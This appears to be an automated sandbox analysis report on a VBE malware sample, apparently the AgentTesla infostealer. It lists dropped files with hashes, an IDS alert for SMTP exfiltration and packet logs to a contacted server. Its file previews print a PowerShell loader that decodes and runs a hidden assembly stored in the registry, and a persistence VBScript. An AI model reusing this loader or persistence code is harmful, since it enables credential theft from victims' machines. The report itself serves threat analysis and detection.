                                    Process:C:\Windows\System32\wermgr.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4899
                                    Entropy (8bit):4.568334921850061
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsfJg771I9n0WpW8VYRYm8M4JFKlnOtSFf4yq8vT0OtaytfBd:uIjfBI70t7VFJFKlnmWT0LufBd
                                    MD5:AC59CFDDAE827AA6BCDF15F742D5FFB4
                                    SHA1:057439C3A49BE6A4ABDFB68AD7B71E347571102B
                                    SHA-256:8DE28C1F996F15D732AD69850144DC23B5DAD966678036271DD631AB43244C2E
                                    SHA-512:0882513C2CD2924FB122D5B1DF8B11F4548862717599C588387A012DFD1129AB2677B39B4AD8F636BC5D32C1025B43C9DC55FA7B1BD657D24601C697E74C6957
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675373" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11887
                                    Entropy (8bit):4.901437212034066
                                    Encrypted:false
                                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                    Malicious:false
                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3256
                                    Entropy (8bit):5.404109340363203
                                    Encrypted:false
                                    SSDEEP:96:gEzlHyIFKL2O9qrh7Kf+oRJ5Eo9AdrxwN:V1yt2jrAfRLL2G
                                    MD5:047B195D3B8C00130835658997B1925D
                                    SHA1:5F77C7A5F798C4C0253839EBD7554B13987704E3
                                    SHA-256:B2C2801565403B2348CAF820F20B4B92C8725A5079D5360DAF455E84D28AC1FB
                                    SHA-512:D1724BE394B214B914A236AC1D55DB17B93669880BB3F71057DCD070AF3062FBFF494ABE085345015FCDF5FE6B11BAE9A19FCD20DC4EB749E13F31CD5565D60D
                                    Malicious:false
                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2eutwi3g.dlw.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pczw0rl0.ttj.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):252
                                    Entropy (8bit):5.461689719340332
                                    Encrypted:false
                                    SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83mWngzsHg4HXZuBiA2V0LYC7zsHgB2eFI59:772EtSXqd27zmg4HJci1V0LYIzmg0eo
                                    MD5:C7CDD3174DC32767F2CC2DF349ECA42D
                                    SHA1:12F4B14FAD7684BDEA591434D442B6E08090BA81
                                    SHA-256:5CE8777F785CD74A693EEA29A30284D5EF2C8C1EB7C8343BC211F6821DBA0862
                                    SHA-512:FC15820CCD44797983B213C6B57CC8AC19491BCE94BDB0D44637287D5C9878445B98B542AC7F3EA4646C6FA5609AC99EBE72BA5FCD5F88F68D1433EAA722B3CF
                                    Malicious:false
                                    Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\bEvujIIdkyIbOgF' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('bEvujIIdkyIbOgF')..Stop-Process -Name conhost -Force..

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6225
                                    Entropy (8bit):3.7249737578253774
                                    Encrypted:false
                                    SSDEEP:96:8BM5Q2C8rEkvhkvCCtP19LQueiHZw9LQuezHZc:8i5QG0P1yKwy7c
                                    MD5:305066BBDC45E9918F0EE2CB1EA587ED
                                    SHA1:C53CC0051037F33A27EC9AE6BB3B69CA6063D2A4
                                    SHA-256:9876493A5BF35ED7872D4EA2AFC0C71298F031FB8BBC95E17E28BEE8C1CBBA21
                                    SHA-512:18B6A09BB0A341E47785307E27B18870A4C515ACCE645CD9CFE69E873A76AAA568F99DB9AD701BEE8531FCAA4E60F25DAD3174416EE0285B4C75F8BFACFCBD97
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....*_....k.:df..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....4.Xf.....;df......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.ZaI..........................3*N.A.p.p.D.a.t.a...B.V.1......Z.=..Roaming.@......EW.=.Z.=..............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Z.=..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Z.=..........................".7.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Z.=....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Z.=....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.ZaI....9...........

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EM1Y4EOMQ0XZVX9ATC1N.temp

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6225
                                    Entropy (8bit):3.7249737578253774
                                    Encrypted:false
                                    SSDEEP:96:8BM5Q2C8rEkvhkvCCtP19LQueiHZw9LQuezHZc:8i5QG0P1yKwy7c
                                    MD5:305066BBDC45E9918F0EE2CB1EA587ED
                                    SHA1:C53CC0051037F33A27EC9AE6BB3B69CA6063D2A4
                                    SHA-256:9876493A5BF35ED7872D4EA2AFC0C71298F031FB8BBC95E17E28BEE8C1CBBA21
                                    SHA-512:18B6A09BB0A341E47785307E27B18870A4C515ACCE645CD9CFE69E873A76AAA568F99DB9AD701BEE8531FCAA4E60F25DAD3174416EE0285B4C75F8BFACFCBD97
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....*_....k.:df..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....4.Xf.....;df......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.ZaI..........................3*N.A.p.p.D.a.t.a...B.V.1......Z.=..Roaming.@......EW.=.Z.=..............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Z.=..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Z.=..........................".7.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Z.=....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Z.=....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.ZaI....9...........

                                    C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):2915
                                    Entropy (8bit):5.0505975283730935
                                    Encrypted:false
                                    SSDEEP:48:lnJrvgJXVv0qD4p7pYazwHYMH9KHaANMaBoqpotJ8gfng++E/uTcb6OqaBXl8zma:lJL4VvlDQepHXH4HaDaK8gPOOqav97ZS
                                    MD5:DDF1E2F5DE2CE71CCF56AF38DEDB27D0
                                    SHA1:0033A0EB6BABB97203CB8BB7F68287CFAC9D96DC
                                    SHA-256:0A988536FC481BD16AF5469D5FAA1BBB9DC321601DFA858479C01844A3CDD1C8
                                    SHA-512:F4E451051D3BF74FAF142973EF1F2A8C008D654F6D7178DBC426DCEEE2F16FB88C90980E3E12E77B3499D9F7A0BC4F36FAAFAD35FB52BB9C8F8BA03AE2585941
                                    Malicious:true
                                    Preview:Option Explicit..' Nombre du projet: bEvujIIdkyIbOgF.' Variables globales.Dim ShellObjet, DossierWindows, CompteurIterations.Set ShellObjet = CreateObject("WScript.Shell").DossierWindows = ShellObjet.ExpandEnvironmentStrings("%windir%")..' Programme principal.Call Initialisation().Call ExecutionPrincipale()..' Initialisation des parametres du programme.Sub Initialisation(). CompteurIterations = 0.End Sub..' Routine principale pour gerer l'execution du programme.Sub ExecutionPrincipale(). Do While CompteurIterations < 10000 ' Limite d'iterations pour demonstration. Call VerifierEtDemarrerPowerShell(). WScript.Sleep 10000. CompteurIterations = CompteurIterations + 1. Loop.End Sub..' Procedure pour verifier et demarrer PowerShell si necessaire.Sub VerifierEtDemarrerPowerShell(). If Not ProcessEnCours(ShellObjet.RegRead("HKEY_CURRENT_USER\Software\bEvujIIdkyIbOgF\i")) Then. If ShellObjet.RegRead("HKEY_CURRENT_USER\Software\bEvujIIdkyIbOgF\in") = "1"

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                    Category:dropped
                                    Size (bytes):1535
                                    Entropy (8bit):4.478053210063729
                                    Encrypted:false
                                    SSDEEP:24:EiNvPk/vNa2V269+Iz2HUdSjeKm3uSmcHsU9MxOAX4WLeX4WgeX4WgeX4WneX4WV:E8fWxZz2HUwysU9+OAX+X5XpXKX/XFXP
                                    MD5:A430FAAC8500758DEB4EC4B683FC67FD
                                    SHA1:9EA0D778BC2D1129A9EEE69C88BA4BB6C1D980CC
                                    SHA-256:92EEDA3B526893E695727BF47E32FA17FC2399FAEF376815E7A130CDD6189C67
                                    SHA-512:DBC248F21372A0E20C37DB066F4CB3775F232D5737BE8B7F8974A46F402B46C1705900CED0B47CAA6AADA82CAF1700059D10AE64DB25CE510646699D72567813
                                    Malicious:false
                                    Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mCon.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\bEvujIIdkyIbOgF'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'bEvujIIdkyIbOgF'.[33m).[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90

                                    Static File Info

                                    General

                                    File type:data
                                    Entropy (8bit):3.9908336623105405
                                    TrID:
                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                    • MP3 audio (1001/1) 32.22%
                                    • Lumena CEL bitmap (63/63) 2.03%
                                    • Corel Photo Paint (41/41) 1.32%
                                    File name:009.vbe
                                    File size:10'722 bytes
                                    MD5:9ff77002fbcbdd6e749722541b423034
                                    SHA1:ea5ff219e2dde3cc57a1668ff0526be5b84e1250
                                    SHA256:5b3b169b48056c1cd8b84093c312de2f9ec1c7a1edcd7591743f6eac62c98ab9
                                    SHA512:609f25739f34355e0e37fd244cd743f3442be6cb2518ff9fa0ec58ec5ec103e730d5f005ca86c040a7b3a078d49dd6b2363659085eaecc2de2fd24159da13388
                                    SSDEEP:192:meHNd/sigyXaoMutGV+GCCYSyC+QvdyNhnKxtKlK:5HMiTDV+xnYSH+QVyNhnctKM
                                    TLSH:F522EA58DFDD44C0F7216B864BC9D7629B1F6A245B0F4AC20D61428B373ED80ADA9F39
                                    File Content Preview:..#.@.~.^.1.x.Q.A.A.A.=.=.v.,.'.x.{.P.j.....D.k.6.k.1.C.Y.b.W.U./.,./.z.d.D.....:.+.,.x.'.{.@.#.@.&.w.;.U.m.D.k.K.x.~.|.P.K.I.`.b.@.#.@.&.~.P.,.P.6.U.,.2.D...G.M.P.].+.k.;.s.+.~.g.+.X.Y.@.#.@.&.P.,.~.P.G.k.h.P.o.A.J.K.B.P.p.\...I.B.P.K.t.].F.@.#.@.&.P.,.P

                                    File Icon

                                    Icon Hash:68d69b8f86ab9a86

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-14T08:47:05.827514+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.749972162.254.34.31587TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 14, 2025 08:47:05.827513933 CET49671443192.168.2.7204.79.197.203
                                    Jan 14, 2025 08:47:07.561885118 CET49674443192.168.2.7104.98.116.138
                                    Jan 14, 2025 08:47:07.564850092 CET49675443192.168.2.7104.98.116.138
                                    Jan 14, 2025 08:47:07.733778954 CET49672443192.168.2.7104.98.116.138
                                    Jan 14, 2025 08:47:09.033509016 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.038815022 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.038903952 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.039079905 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.044102907 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664688110 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664751053 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664792061 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664828062 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664864063 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664901972 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664938927 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.664973974 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.665009975 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.665010929 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.665011883 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.665011883 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.665049076 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.665065050 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.665920973 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.670001984 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.670037985 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.670074940 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.670104980 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.670209885 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.757711887 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.757769108 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.757807970 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.757843018 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.757879019 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.757883072 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.757919073 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.757965088 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.758019924 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.758043051 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.758043051 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.758054972 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.758089066 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.758110046 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.758125067 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:09.758152008 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.811769009 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.843817949 CET49677443192.168.2.720.50.201.200
                                    Jan 14, 2025 08:47:09.884834051 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:09.889950037 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.070270061 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.080144882 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.085067034 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.218025923 CET49677443192.168.2.720.50.201.200
                                    Jan 14, 2025 08:47:10.265604019 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265650034 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265708923 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265717983 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.265744925 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265780926 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265790939 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.265815020 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265851021 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265885115 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.265897036 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.266582966 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.266619921 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.266635895 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.266665936 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.266918898 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.266968966 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267004013 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267016888 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.267038107 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267071009 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267083883 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.267694950 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267786980 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267822027 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267843008 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.267857075 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267872095 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.267893076 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267930031 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.267975092 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.268616915 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.268651009 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.268685102 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.268702030 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.268719912 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.268726110 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.268754959 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.268790960 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.268810034 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.269567966 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.269602060 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.269635916 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.269654036 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.269670010 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.269680023 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.269705057 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.269738913 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.269750118 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.327403069 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.358550072 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.358601093 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:10.358680964 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:10.639919996 CET49671443192.168.2.7204.79.197.203
                                    Jan 14, 2025 08:47:10.968031883 CET49677443192.168.2.720.50.201.200
                                    Jan 14, 2025 08:47:11.210165977 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:11.215276957 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:11.395622969 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:11.436793089 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:11.631129026 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:11.633534908 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:11.636770964 CET8049699144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:11.636838913 CET4969980192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:11.638678074 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:11.638748884 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:11.642347097 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:11.647290945 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.269232035 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.269288063 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.269324064 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.269340992 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.269359112 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.269395113 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.269407988 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.269433022 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.269491911 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.295655966 CET4970080192.168.2.7144.91.79.54
